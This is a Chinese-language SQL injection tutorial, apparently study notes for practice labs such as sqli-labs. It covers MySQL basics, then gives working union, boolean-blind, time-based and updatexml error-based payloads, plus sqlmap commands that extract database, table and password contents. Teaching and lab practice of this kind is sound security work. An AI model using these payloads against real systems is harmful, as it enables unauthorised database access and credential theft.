SQL注入

SQL注入

SQL注入手工注入更加能学到实质性的技术！

1.数据库

用来存放数据的仓库

SQL是一种数据库查询和程序设计语言。用于存取数据以及查询、更新和管理关系数据库系统。

常见的SQL数据库有MySQL，SQL server，Oracle、Sybase、db2…不同的数据库所使用的SQL语句也不一样。

MySQL数据库

MySQL数据库的结构：

数据库中包含表，表是由列组成的，表中的数据是按照行的形式存储的

SQL图形化工具Navicat

可以看的在搭建靶场时的一些数据库dvwa，sql-lab，pikachu等。

SQL语句

学习SQL的网站：菜鸟教程

操作数据库主要的是：增删改查

查：select语句

select 列名 from 表名

select * from 表名 （查询该表的所有列）

增：insert into

insert into 表名 values （值1，值2，…）

insert into table_name (列1，列2, …) values (值1，值2，…)

删：delete语句

delete from 表名 where 列名 = 值

delete * from 表名 （删除表中所有列）

改：update语句

UPDATE 表名称 SET 列名称 = 新值 WHERE 列名称 = 某值

还有一些其他的注入用到的语法

order by ：可以判断字段数（列数）

limit ：limit 0,1 从你表中的第一个数据开始，只读取一个

where ：条件选取

and ：且，and前后都为真，回显正常

or ： 或，or前后有一个为真，回显正常

MySQL基础

01、显示数据库 show databases；

02、打开数据库 use db_name;

03、显示数据表 show tables;

04、显示表结构 describe table_name;

05、显示表中各字段信息，即表结构 show columns from table_name;

06、显示表创建过程 show create table 表名;

07、列出当前mysql的相关状态信息 status;

08、删除数据库 drop database 数据库名;

09、清空数据表 delete from table_name; truncate table table_name;

10、删除数据表 drop table table_name

11、数据库连接 mysql –uroot -proot

12、数据库退出 exit

MYSQL系统表

• information_schema

SCHEMATA 表：提供了当前mysql实例中所有数据库的信息。

​ show databases的结果取之此表。

TABLES 表：提供了关于数据库中的表的信息。

​ 详细表述了某个表属于哪个schema，表类型，表引擎，创建时间等信息。

COLUMNS 表：提供了表中的列信息。

2.SQL注入原理

web应用程序对用户输入数据的合法性没有判断，前端传入后端的参数是攻击者可控的，并且参数带入数据库查询，攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。

SQL注入产生需要满足一下两个条件

1. 参数用户可控: 前端传给后端的参数内容是用户可以控制的。
2. 参数带入数据库查询: 传入的参数拼接到SQL语句，且带入数据库查询。

3.SQL注入的危害

1. 获取敏感数据：获取网站管理员帐号、密码等。
2. 绕过登录验证：使用万能密码登录网站后台等。
3. 文件系统操作：列目录，读取、写入文件等。
4. 注册表操作：读取、写入、删除注册表等。
5. 执行系统命令：远程执行命令。

4.SQL注入判断

根据客户端返回的结果来判断提交的测试语句是否成功被数据库引擎执行，如果测试
语句被执行了，说明存在注入漏洞。

5.SQL注入的分类

1. 按参数类型分类：
   数字型
   字符型
   搜索型
2. 按数据库返回结果分类：
   回显注入
   报错注入
   盲注
   基于布尔的盲注
   基于时间的盲注
3. 按注入点位置分类：
   GET注入
   POST注入
   Cookie注入
   Header注入

SQL注入利用

union注入

get报错注入，在URL中代入参数，服务器响应时，产生报错信息，在url中构建SQL语句，和参数一起代入数据库执行，参数是错误参数，但是构造的SQL语句是正确的语句，然后报错显示出来SQL语句执行结果。

GET显错注入流程
01、获取字段数 order by x
02、获取显示位 union select 1,2,3,4……
03、获取数据库信息 version()，user()，@@datadir
04、获取当前数据库 database()， schema() ,
05、获取所有数据库
06、获取数据库表
07、获取所有字段
08、获取数据

• 判断：id=1’ and 1=1 --+ id=-1’ or 1=1 --+

• order by语句判断字段数量：

  id=1’ order by 3 --+

• 联合查询获取显示位：

  id=-1’ union select 1,2,3 --+

• 获取当前数据库：

  id=-1’ union select 1,(select database()),3 --+

• 获取所有数据库：

  id=-1’ union select 1,group_concat(schema_name),3 from

  information_schema.schemata --+

• 获取当前数据库表名：

  id=-1’ union select 1,group_concat(table_name),3 from

  information_schema.tables where table_schema=‘security’ --+

• 获取users表所有字段：

  id=-1’ union select 1,group_concat(column_name),3 from

  information_schema.columns where table_name='users‘ --+

• 获取security.users表所有字段

  id=-1’ union select 1,group_concat(column_name),3 from

  information_schema.columns where table_name=‘users’ and

  table_schema=‘security’–+

• 获取security.users表所有字段内容：

  id=-1’ union select 1,username,password from users --+

布尔盲注（boolean）

布尔盲注的基本流程

01、获取当前数据库长度
02、获取当前数据库名
03、获取当前数据库表总数
04、获取当前数据库表的长度
05、获取当前数据库表名
06、获取当前数据库表的字段总数
07、获取当前数据库表的字段第N个长度
08、获取当前数据库表的字段第N个字段名
09、获取当前数据库表的字段内容长度
10、获取当前数据库表的字段内容

• 前置知识

  mid(),substr() 截取字符串

  mid('字符串'，n,m) //mid函数截取字符串第n个字符起的m个字符

  substr('字符串'，n,m) //substr函数用法和mid函数的用法相同

​ ascii(),ord() 返回字段的ASCII码值

​ char() 将ASCII码值转换为字符

​ left(‘字符串’,length) 返回字符串最左边的length个字符串

​ right(‘字符串’,length) 返回字符串最右边的length个字符串

boolean盲注，判断对错后两种情况true和false,构造的payload中带有判断的语句，判断正确时返回正常的页面，判断错误时返回错误对应的页面（一 一尝试），由此来实现获取数据库的信息。在实际操作中，对于盲注更适合使用工具进行注入。

时间注入

and 1=1 与and 1=2 返回的界面一样时，可以用sleep（）也就是基于时间的注入。这个结果与boolean注入非常相似，与之不同的是，时间注入是利用sleep()等函数让数据库的执行时间更长，来确定判断是否正确。时间盲注多与if()结合使用。

第一步：输入and 1=1以及and 1=2

第二步：使用sleep()函数，可观察到刷新了10秒才返回界面

第三步：猜测库名的长度 and if((length(database())=1),1,sleep(10)) --+

其他payload在if（）中构建

例如爆表名：

if(substr(select table_name frominformation_schema.tables where table_schema=database() limit 0,1)=‘#’,sleep(5),1) --+

报错注入

页面上没有显示位，但是需要输出SQL语句执行错误信息。比如mysql_error()

extractvalue()（对xml文档经行查询的函数）

语法: extractvalue(xml文档对象的名称, 符合Xpath格式的字符串)

updatexml()（对xml文档经行修改的函数）

语法：updatexml(xml文档对象的名称, 符合Xpath格式的字符串, 用于替换符合条件的字符串)

获取数据库：

id=1’ and updatexml(0x7e,concat(0x7e,database()),0x7e) --+

获取表的数量：

id=1’ and updatexml(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema=‘security’),0x7e),1) --+

获取表名：

id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) --+
id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e),1) --+
id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 2,1),0x7e),1) --+
id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1) --+

获取字段名：

id=1’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = ‘users’ limit 0,1),0x7e),1) --+

SQL注入分类

1. 从注入参数类型分：数字型注入、字符型注入、搜索型注入
2. 从注入方法分：基于报错、基于布尔盲注、基于时间盲注、联合查询、堆叠注入、内联查询注入、宽字节注入
3. 从提交方式分：GET注入、POST注入、COOKIE注入、HTTP头注入

Sqlmap基本使用

查询当前用户下的所有数据库

sqlmap.py -u "http://www.sqllab1.com/Less-1/?id=1" --dbs

获取数据库中的表名

sqlmap.py -u "http://www.sqllab1.com/Less-1/?id=1" --tables -D "security"

获取表中字段名

sqlmap.py -u "http://www.sqllab1.com/Less-1/?id=1" --columns -T "users" -D "security"

获取字段内容

sqlmap.py -u "http://www.sqllab1.com/Less-1/?id=1" --dump -C "id,password,username" -T "users" -D "security"

获取数据库的所有用户

sqlmap.py -u "http://www.sqllab1.com/Less-1/?id=1" --users

获取当前网站数据库的名称

sqlmap.py -u "http://www.sqllab1.com/Less-1/?id=1" --current-db

获取当前网站数据库的用户名

sqlmap.py -u "http://www.sqllab1.com/Less-1/?id=1" --current-user

在post请求注入时，将url替换成post请求包的TXT文件即可！